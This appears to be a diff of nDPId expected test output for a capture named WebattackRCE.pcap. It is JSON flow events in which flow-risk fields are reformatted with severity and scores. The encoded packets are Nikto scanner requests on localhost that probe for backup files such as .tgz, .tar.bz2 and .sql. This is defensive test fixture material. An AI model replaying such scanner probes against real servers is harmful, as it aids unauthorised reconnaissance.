 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1576420277288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277288,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JlVAAEAGFeR\/AAABfwAAAcSQH5Clfx76D\/AiGIAYAED+sQAAAQEICp1m\/VCdZv1QR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1576420277291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277291,"pkt":"AAAAAAAAAAAAAAAACABFAADCVkJAAEAG5fF\/AAABfwAAAcSSH5BxEW7rgO+zGYAYAED+tgAAAQEICp1m\/VOdZv1SR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1576420277292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277292,"pkt":"AAAAAAAAAAAAAAAACABFAADC9VNAAEAGRuB\/AAABfwAAAcSUH5A3Js37LMn8joAYAED+tgAAAQEICp1m\/VSdZv1UR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1576420277293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277293,"pkt":"AAAAAAAAAAAAAAAACABFAADB0lRAAEAGaeB\/AAABfwAAAcSWH5D4eer6AmSqt4AYAED+tQAAAQEICp1m\/VWdZv1VR0VUIC8xLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1576420277295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277295,"pkt":"AAAAAAAAAAAAAAAACABFAADBgrRAAEAGuYB\/AAABfwAAAcSYH5BqProaPd\/PWYAYAED+tQAAAQEICp1m\/VedZv1XR0VUIC8xLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1576420277296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277296,"pkt":"AAAAAAAAAAAAAAAACABFAADFhERAAEAGt+x\/AAABfwAAAcSaH5DLx7zvpnN3coAYAED+uQAAAQEICp1m\/VidZv1YR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1576420277298,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277298,"pkt":"AAAAAAAAAAAAAAAACABFAADFkbNAAEAGqn1\/AAABfwAAAcScH5DniakeYsnjE4AYAED+uQAAAQEICp1m\/VqdZv1aR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1576420277299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277299,"pkt":"AAAAAAAAAAAAAAAACABFAADATXFAAEAG7sR\/AAABfwAAAcSeH5C5OnXDLQhZdIAYAED+tAAAAQEICp1m\/VudZv1bR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
